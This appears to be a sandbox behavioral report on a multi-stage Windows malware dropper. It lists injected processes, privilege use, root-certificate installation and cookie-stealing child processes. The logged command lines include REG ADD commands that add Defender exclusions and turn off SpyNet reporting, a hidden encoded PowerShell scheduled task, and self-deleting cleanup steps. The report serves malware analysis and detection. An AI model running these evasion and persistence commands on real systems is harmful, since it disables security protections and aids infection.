Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ arnatic_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	arnatic_3.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

arnatic_1.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	arnatic_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	arnatic_1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exearnatic_2.exejfiag3g_gg.exe

pid	process
3760	jfiag3g_gg.exe
3760	jfiag3g_gg.exe
2596	arnatic_2.exe
2596	arnatic_2.exe
2452	jfiag3g_gg.exe
2452	jfiag3g_gg.exe
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2444
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

arnatic_2.exe

pid process

2596 arnatic_2.exe

pid	process
2444

pid	process
2596	arnatic_2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

UGloryStp.exearnatic_6.exeWerFault.execmd.exewU17U4w0H5bF7mZyHs4cVqtG.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3892	UGloryStp.exe
Token: SeDebugPrivilege	3260	arnatic_6.exe
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeDebugPrivilege	2972	WerFault.exe
Token: SeCreateTokenPrivilege	3488	cmd.exe
Token: SeAssignPrimaryTokenPrivilege	3488	cmd.exe
Token: SeLockMemoryPrivilege	3488	cmd.exe
Token: SeIncreaseQuotaPrivilege	3488	cmd.exe
Token: SeMachineAccountPrivilege	3488	cmd.exe
Token: SeTcbPrivilege	3488	cmd.exe
Token: SeSecurityPrivilege	3488	cmd.exe
Token: SeTakeOwnershipPrivilege	3488	cmd.exe
Token: SeLoadDriverPrivilege	3488	cmd.exe
Token: SeSystemProfilePrivilege	3488	cmd.exe
Token: SeSystemtimePrivilege	3488	cmd.exe
Token: SeProfSingleProcessPrivilege	3488	cmd.exe
Token: SeIncBasePriorityPrivilege	3488	cmd.exe
Token: SeCreatePagefilePrivilege	3488	cmd.exe
Token: SeCreatePermanentPrivilege	3488	cmd.exe
Token: SeBackupPrivilege	3488	cmd.exe
Token: SeRestorePrivilege	3488	cmd.exe
Token: SeShutdownPrivilege	3488	cmd.exe
Token: SeDebugPrivilege	3488	cmd.exe
Token: SeAuditPrivilege	3488	cmd.exe
Token: SeSystemEnvironmentPrivilege	3488	cmd.exe
Token: SeChangeNotifyPrivilege	3488	cmd.exe
Token: SeRemoteShutdownPrivilege	3488	cmd.exe
Token: SeUndockPrivilege	3488	cmd.exe
Token: SeSyncAgentPrivilege	3488	cmd.exe
Token: SeEnableDelegationPrivilege	3488	cmd.exe
Token: SeManageVolumePrivilege	3488	cmd.exe
Token: SeImpersonatePrivilege	3488	cmd.exe
Token: SeCreateGlobalPrivilege	3488	cmd.exe
Token: 31	3488	cmd.exe
Token: 32	3488	cmd.exe
Token: 33	3488	cmd.exe
Token: 34	3488	cmd.exe
Token: 35	3488	cmd.exe
Token: SeDebugPrivilege	952	wU17U4w0H5bF7mZyHs4cVqtG.exe
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeShutdownPrivilege	2444
Token: SeCreatePagefilePrivilege	2444
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeShutdownPrivilege	2444

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

Accostarmi.exe.pif

pid	process
1404	Accostarmi.exe.pif
2444
2444
1404	Accostarmi.exe.pif
1404	Accostarmi.exe.pif
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444
2444

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

1404 Accostarmi.exe.pif
1404 Accostarmi.exe.pif
1404 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

lT7Ktq7RZVK5NGevobiXldEi.exe

pid process

4080 lT7Ktq7RZVK5NGevobiXldEi.exe

pid	process
4080	lT7Ktq7RZVK5NGevobiXldEi.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_4.exearnatic_6.exearnatic_3.exearnatic_7.exe

description	pid	process	target process
PID 2144 wrote to memory of 992	2144	747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe	setup_installer.exe
PID 2144 wrote to memory of 992	2144	747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe	setup_installer.exe
PID 2144 wrote to memory of 992	2144	747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe	setup_installer.exe
PID 992 wrote to memory of 3436	992	setup_installer.exe	setup_install.exe
PID 992 wrote to memory of 3436	992	setup_installer.exe	setup_install.exe
PID 992 wrote to memory of 3436	992	setup_installer.exe	setup_install.exe
PID 3436 wrote to memory of 1984	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 1984	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 1984	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 1876	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 1876	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 1876	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2184	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2184	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2184	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3276	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3276	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3276	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3172	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3172	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 3172	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2708	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2708	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2708	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2704	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2704	3436	setup_install.exe	cmd.exe
PID 3436 wrote to memory of 2704	3436	setup_install.exe	cmd.exe
PID 2704 wrote to memory of 2112	2704	cmd.exe	arnatic_7.exe
PID 2704 wrote to memory of 2112	2704	cmd.exe	arnatic_7.exe
PID 2704 wrote to memory of 2112	2704	cmd.exe	arnatic_7.exe
PID 1984 wrote to memory of 1852	1984	cmd.exe	arnatic_1.exe
PID 1984 wrote to memory of 1852	1984	cmd.exe	arnatic_1.exe
PID 1984 wrote to memory of 1852	1984	cmd.exe	arnatic_1.exe
PID 3172 wrote to memory of 3448	3172	cmd.exe	arnatic_5.exe
PID 3172 wrote to memory of 3448	3172	cmd.exe	arnatic_5.exe
PID 3172 wrote to memory of 3448	3172	cmd.exe	arnatic_5.exe
PID 2184 wrote to memory of 3700	2184	cmd.exe	arnatic_3.exe
PID 2184 wrote to memory of 3700	2184	cmd.exe	arnatic_3.exe
PID 2184 wrote to memory of 3700	2184	cmd.exe	arnatic_3.exe
PID 2708 wrote to memory of 752	2708	cmd.exe	arnatic_6.exe
PID 2708 wrote to memory of 752	2708	cmd.exe	arnatic_6.exe
PID 2708 wrote to memory of 752	2708	cmd.exe	arnatic_6.exe
PID 3276 wrote to memory of 3684	3276	cmd.exe	arnatic_4.exe
PID 3276 wrote to memory of 3684	3276	cmd.exe	arnatic_4.exe
PID 3276 wrote to memory of 3684	3276	cmd.exe	arnatic_4.exe
PID 1876 wrote to memory of 2596	1876	cmd.exe	arnatic_2.exe
PID 1876 wrote to memory of 2596	1876	cmd.exe	arnatic_2.exe
PID 1876 wrote to memory of 2596	1876	cmd.exe	arnatic_2.exe
PID 3684 wrote to memory of 3008	3684	arnatic_4.exe	jfiag3g_gg.exe
PID 3684 wrote to memory of 3008	3684	arnatic_4.exe	jfiag3g_gg.exe
PID 3684 wrote to memory of 3008	3684	arnatic_4.exe	jfiag3g_gg.exe
PID 752 wrote to memory of 3260	752	arnatic_6.exe	arnatic_6.exe
PID 752 wrote to memory of 3260	752	arnatic_6.exe	arnatic_6.exe
PID 752 wrote to memory of 3260	752	arnatic_6.exe	arnatic_6.exe
PID 3700 wrote to memory of 3264	3700	arnatic_3.exe	rUNdlL32.eXe
PID 3700 wrote to memory of 3264	3700	arnatic_3.exe	rUNdlL32.eXe
PID 3700 wrote to memory of 3264	3700	arnatic_3.exe	rUNdlL32.eXe
PID 2112 wrote to memory of 3888	2112	arnatic_7.exe	jhuuee.exe
PID 2112 wrote to memory of 3888	2112	arnatic_7.exe	jhuuee.exe
PID 2112 wrote to memory of 3888	2112	arnatic_7.exe	jhuuee.exe
PID 2112 wrote to memory of 1456	2112	arnatic_7.exe	liqian.exe
PID 2112 wrote to memory of 1456	2112	arnatic_7.exe	liqian.exe
PID 2112 wrote to memory of 1456	2112	arnatic_7.exe	liqian.exe
PID 2112 wrote to memory of 3892	2112	arnatic_7.exe	UGloryStp.exe

C:\Users\Admin\AppData\Local\Temp\747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe
"C:\Users\Admin\AppData\Local\Temp\747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2144

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:992

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_7.exe
arnatic_7.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2112

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3888

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:1120

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2452

C:\Users\Admin\AppData\Local\Temp\liqian.exe
"C:\Users\Admin\AppData\Local\Temp\liqian.exe"
6⤵
- Executes dropped EXE
PID:1456

C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe
"C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_6.exe
arnatic_6.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:752

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_6.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_5.exe
arnatic_5.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3448

C:\Users\Admin\Documents\MXiSZ80F3NuU3QFhkzcKK6R5.exe
"C:\Users\Admin\Documents\MXiSZ80F3NuU3QFhkzcKK6R5.exe"
6⤵
- Executes dropped EXE
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 432
7⤵
- Program crash
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 476
7⤵
- Program crash
PID:4372

C:\Users\Admin\Documents\4_PAcDG7wnNqYxr5U35B_AMw.exe
"C:\Users\Admin\Documents\4_PAcDG7wnNqYxr5U35B_AMw.exe"
6⤵
PID:2972

C:\Users\Admin\AppData\Local\Temp\f80a76f6-eb7a-40f6-93a0-934db13c03a5.exe
"C:\Users\Admin\AppData\Local\Temp\f80a76f6-eb7a-40f6-93a0-934db13c03a5.exe"
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5032

C:\Users\Admin\Documents\s_7xA2ANj10yKSSQQgynJ9xW.exe
"C:\Users\Admin\Documents\s_7xA2ANj10yKSSQQgynJ9xW.exe"
6⤵
- Executes dropped EXE
PID:3936

C:\Users\Admin\Documents\qy2IEmqybmpCEpYPWmuUaf0W.exe
"C:\Users\Admin\Documents\qy2IEmqybmpCEpYPWmuUaf0W.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1512

C:\Users\Admin\Documents\RNxU6z5r9OWdg_t70GnZrQfQ.exe
"C:\Users\Admin\Documents\RNxU6z5r9OWdg_t70GnZrQfQ.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RNxU6z5r9OWdg_t70GnZrQfQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\RNxU6z5r9OWdg_t70GnZrQfQ.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:3700

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RNxU6z5r9OWdg_t70GnZrQfQ.exe /f
8⤵
- Kills process with taskkill
PID:1856

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:2140

C:\Users\Admin\Documents\y6jHLX3YnTYybwFvcHrByU2F.exe
"C:\Users\Admin\Documents\y6jHLX3YnTYybwFvcHrByU2F.exe"
6⤵
PID:3248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 436
7⤵
- Program crash
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 444
7⤵
- Program crash
PID:316

C:\Users\Admin\Documents\lIzF3MpI9W8WHI55g3JIRBYG.exe
"C:\Users\Admin\Documents\lIzF3MpI9W8WHI55g3JIRBYG.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1528

C:\Users\Admin\Documents\lIzF3MpI9W8WHI55g3JIRBYG.exe
C:\Users\Admin\Documents\lIzF3MpI9W8WHI55g3JIRBYG.exe
7⤵
- Executes dropped EXE
PID:4664

C:\Users\Admin\Documents\dbDta9ljNdTdYzsF60vMQeWW.exe
"C:\Users\Admin\Documents\dbDta9ljNdTdYzsF60vMQeWW.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:1392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:4136

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:5048

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
9⤵
- Enumerates processes with tasklist
PID:3168

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
9⤵
PID:4956

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
9⤵
- Enumerates processes with tasklist
PID:2652

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
9⤵
PID:2892

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
9⤵
PID:376

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
10⤵
PID:4068

C:\Users\Admin\Documents\wU17U4w0H5bF7mZyHs4cVqtG.exe
"C:\Users\Admin\Documents\wU17U4w0H5bF7mZyHs4cVqtG.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Users\Admin\Documents\MVUiaEbYet7ZR5D0VaFo322l.exe
"C:\Users\Admin\Documents\MVUiaEbYet7ZR5D0VaFo322l.exe"
6⤵
- Executes dropped EXE
PID:3584

C:\Users\Admin\AppData\Local\Temp\7zSDB07.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:4696

C:\Users\Admin\AppData\Local\Temp\7zSEA68.tmp\Install.exe
.\Install.exe /S /site_id "525403"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5012

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3488

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:1104

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:4112

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:4868

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
- Executes dropped EXE
PID:3248

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:2940

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEOGGwioP" /SC once /ST 00:08:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:4156

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEOGGwioP"
9⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEOGGwioP"
9⤵
PID:4392

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\YAnxQmd.exe\" j6 /site_id 525403 /S" /V1 /F
9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1596

C:\Users\Admin\Documents\ezWBROZT4uZYUwrxDwo0l1Wh.exe
"C:\Users\Admin\Documents\ezWBROZT4uZYUwrxDwo0l1Wh.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
7⤵
PID:3744

C:\Users\Admin\Documents\wQG0qtyPvykccUzsfzHkOlc4.exe
"C:\Users\Admin\Documents\wQG0qtyPvykccUzsfzHkOlc4.exe"
6⤵
- Executes dropped EXE
PID:480

C:\Users\Admin\Documents\2mVp4eXFFWN6z_aOx7kGHrb3.exe
"C:\Users\Admin\Documents\2mVp4eXFFWN6z_aOx7kGHrb3.exe"
6⤵
PID:3488

C:\Users\Admin\Documents\NZnkrHKpnQ2ppyC0J5WWbCbj.exe
"C:\Users\Admin\Documents\NZnkrHKpnQ2ppyC0J5WWbCbj.exe"
6⤵
- Executes dropped EXE
PID:4044

C:\Users\Admin\Documents\5Bd7ndGVBXBbpWnDKJ_jqJyY.exe
"C:\Users\Admin\Documents\5Bd7ndGVBXBbpWnDKJ_jqJyY.exe"
6⤵
- Executes dropped EXE
PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\5Bd7ndGVBXBbpWnDKJ_jqJyY.exe
7⤵
PID:1636

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
8⤵
PID:2312

C:\Users\Admin\Documents\AmZEkXB56CCIr8oGgBm2t31G.exe
"C:\Users\Admin\Documents\AmZEkXB56CCIr8oGgBm2t31G.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2948

C:\Users\Admin\Documents\9AMxt77ZfihiU4VeKdxGSyym.exe
"C:\Users\Admin\Documents\9AMxt77ZfihiU4VeKdxGSyym.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 680
7⤵
- Program crash
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1228
7⤵
- Program crash
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1236
7⤵
- Program crash
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1308
7⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1228
7⤵
- Program crash
PID:3104

C:\Windows\SysWOW64\cmd.exe
